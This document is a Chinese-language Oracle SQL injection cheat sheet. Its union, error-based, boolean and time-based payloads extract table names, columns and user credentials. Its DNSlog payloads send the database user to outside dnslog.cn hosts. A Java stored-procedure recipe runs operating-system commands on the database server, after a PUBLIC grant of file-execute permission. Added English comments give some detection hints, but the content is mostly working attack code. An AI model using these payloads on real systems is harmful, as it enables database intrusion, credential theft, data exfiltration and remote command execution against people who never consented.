手工注入

常规有回显注入

order by 3--
and 1=2 union select null,null,null from dual--
and 1=2 union select 'null',null,null from dual-- //返回正常,则第一个字段是数字型;返回错误,则为字符型
and 1=2 union select 1,'2','3' from dual-- //判断显示位
and 1=2 union select null,(select banner from sys.v_$version where rownum=1),null from dual-- //探测数据库版本信息
and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual-- //查询第一个表名
and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name<>'STUDENT'),null from dual-- //查询第二个表名(排除已得到的第一个表 STUDENT)

获取关键表中的列名:
' union select null,(select column_name from user_tab_columns where table_name='T_USER' and rownum=1),null from dual --

' union select null,(select column_name from user_tab_columns where table_name='T_USER' and column_name<>'SUSER' and rownum=1),null from dual --

' union select null,(select column_name from user_tab_columns where table_name='T_USER' and column_name<>'SUSER' and column_name<>'SPWD' and rownum=1),null from dual --

' union select null,(select column_name from user_tab_columns where table_name='T_USER' and column_name<>'SUSER' and column_name<>'SPWD' and column_name<>'SNAME' and rownum=1),null from dual --

and 1=2 union select SNAME,SUSER,SPWD from T_USER where id=1-- //查看数据

第二种常规注入
确定回显位,假设当前共 2 个字段,全是数字型,判断方式如下:
and 1=2 union select 1,2 from dual 假设回显位是 2,爆当前数据库中的第一个表:
and 1=2 union select 1,(select table_name from user_tables where rownum=1) from dual 爆当前数据库中的第二个表:
and 1=2 union select 1,(select table_name from user_tables where rownum=1 and table_name not in ('第一个表')) from dual 以此类推去爆第 n 个表
爆某表中的第一个字段:
and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='表名(大写的)') from dual 爆某表中的第二个字段:
and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='表名' and column_name not in ('第一个字段')) from dual 爆其它字段以此类推
爆某表中的第一行数据:
and 1=2 union select 1,字段 1|| 字段 2…|| 字段 n from 表名 where rownum=1 -- 连接多个字段用到的连接符是 ||;在 Oracle 数据库中,concat 函数只能连接两个字符串

报错注入

利用 utl_inaddr.get_host_name
这种方法在 Oracle 8i、9i、10g 中不需要任何权限,但在 Oracle 11g 及以后的版本中,当前数据库用户必须具有网络访问权限。

jsp?name=' and 1=utl_inaddr.get_host_name((select user from dual)) --

ctxsys.drithsx.sn()
jsp?name=' and 1=ctxsys.drithsx.sn(1,(select user from dual)) --

dbms_xdb_version.checkin()
jsp?name=1' and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null --

dbms_utility.sqlid_to_sqlhash()
jsp?name=1' and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --

XMLType()
sname=1' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --

布尔注入

jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) -- # 判断 user 的第一个字母是否为 S:是则返回 1,否则返回 0

时间盲注

主要用 DBMS_PIPE.RECEIVE_MESSAGE
即当 user 的第一位是 "A" 时,查询会延时 5 秒再返回。
And 1=(select decode(substr(user,1,1),'A',DBMS_PIPE.RECEIVE_MESSAGE('a',5) ,0) from dual)
同理,第二位是 D 时延时 5 秒:
And 1=(select decode(substr(user,2,1),'D',DBMS_PIPE.RECEIVE_MESSAGE('a',5) ,0) from dual)

news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',5),0) from dual) --

DNSlog 注入

utl_inaddr.get_host_address
select utl_inaddr.get_host_address((select user from dual)||'.cbb1ya.dnslog.cn') from dual

SYS.DBMS_LDAP.INIT 这个函数在 10g/11g 中是 public 权限.
SELECT DBMS_LDAP.INIT((select user from dual)||'.24wypw.dnslog.cn',80) FROM DUAL;

提权

创建java函数提权

  • dba权限

  1. 使用 sqlplus 连接
system/system@192.168.117.66:1521/orcl
  2. 赋权
-- Grants every database user (PUBLIC) the Java permission java.io.FilePermission with
-- read/write/execute/delete on <<ALL FILES>>. The 'execute' action is what allows the
-- Runtime.exec call in the Java source below to start OS processes; the grant itself
-- needs DBA-level privilege (hence the SYSTEM connection in the previous step).
-- Defensive note: this grant is visible in DBA_JAVA_POLICY and can be undone with
-- dbms_java.revoke_permission; a PUBLIC <<ALL FILES>> grant should be treated as an
-- indicator of compromise and alerted on.
begin dbms_java.grant_permission( 'PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete' );end;
/
  3. 创建 Java 代码
create or replace and compile java source named exe_linux as
// Loaded into the database as Java source object EXE_LINUX. The call spec that follows
// binds to the Java *class* name Test, not to the source object name exe_linux.
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.UnknownHostException; // not referenced below
/**
 * Runs an operating-system command inside the Oracle JVM (presumably with the OS
 * privileges of the database server process) and echoes the child's stdout and
 * stderr through System.out. That output only reaches the client after
 * dbms_java.set_output redirects it into the SQL*Plus buffer (see the final step).
 * Execution is possible only because the preceding grant gives PUBLIC
 * java.io.FilePermission 'execute' on <<ALL FILES>>.
 *
 * Defensive view: a JAVA SOURCE object calling Runtime.exec, together with such a
 * grant, indicates OS-level compromise through the database. Audit DBA_JAVA_POLICY
 * and the creation of Java sources / Java call specs, and keep the privilege to
 * run dbms_java.grant_permission away from application accounts.
 */
public class Test
{
/**
 * Executes {@code str} as an OS command line.
 *
 * @param str the command line handed unchanged to Runtime.exec
 * @return always the empty string; all output goes to System.out, not the return value
 */
public static String list_cmd(String str){
Runtime runtime=Runtime.getRuntime();
// Charset used to decode the child process's output; GBK suggests a Chinese-locale host.
StringBuffer enco = new StringBuffer();
enco.append("GBK");
try{
Process proc =runtime.exec(str);
InputStream inp_suc=proc.getInputStream();
InputStream inp_err=proc.getErrorStream();
BufferedReader bfr_err = new BufferedReader(new InputStreamReader(inp_err,enco.toString()));
BufferedReader bfr_suc = new BufferedReader(new InputStreamReader(inp_suc,enco.toString()));
String strLine;
// stdout is drained completely before stderr is read; both go to the same channel.
while( (strLine=(bfr_suc.readLine())) != null){

System.out.println(strLine);
}
while( (strLine=(bfr_err.readLine())) != null){

System.out.println(strLine);
}
proc.destroy();
inp_suc.close();
inp_err.close();
}catch (Exception e) {
// Any failure is reported on the output channel rather than propagated to the caller.
System.out.println("EXECUTE IS ERROR!");
System.out.println(e.getMessage());
}
return "";
}

/* public static void main(String[] args){

list_cmd(args[0]);
}
**/
}

/
  4. 创建存储过程
-- PL/SQL call specification that exposes Test.list_cmd (from the EXE_LINUX Java
-- source above) as a SQL-callable procedure. Note the binding is to the Java class
-- name 'Test', not to the source object name exe_linux.
-- Defensive note: call specs are stored as ordinary PL/SQL, so a search of DBA_SOURCE
-- for LANGUAGE JAVA wrappers finds them; one wrapping a Runtime.exec method is a
-- strong indicator of post-exploitation tooling left in the database.
create or replace procedure p_exe_linux(str varchar2) as language java
name 'Test.list_cmd(java.lang.String)';
/
  5. 命令执行
-- SET SERVEROUTPUT ON together with dbms_java.set_output redirects the System.out
-- writes made by list_cmd into the SQL*Plus output buffer; without them the command
-- would still run but its output would not reach the session. The EXEC line invokes
-- the wrapper created above with a single OS command string.
SET SERVEROUTPUT ON
exec dbms_java.set_output(1111111111111);
EXEC P_EXE_LINUX('whoami');

Other

查找当前用户模式中所有列名疑似涉及个人信息的表和字段

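-- Data-discovery query: columns in the current user's own tables whose names suggest
-- personal data (USER_TAB_COLUMNS covers only the current schema). Explicit columns
-- replace SELECT * so the output is stable across dictionary-view changes, and the
-- ORDER BY makes results deterministic for comparison between runs.
-- regexp_like is case-sensitive under the default (binary) NLS_SORT, so the English
-- keywords only match the usual upper-case unquoted identifiers; broad terms such as
-- NAME and NUMBER will produce false positives, so review the result set manually.
SELECT
    table_name,
    column_name,
    data_type
FROM user_tab_columns
WHERE regexp_like(column_name,'NAME|PHONE|MOBILE|CERTIFICATE|NUMBER|EMAIL|ADDR|CARD|电话|地址|身份证|姓名')
ORDER BY table_name, column_name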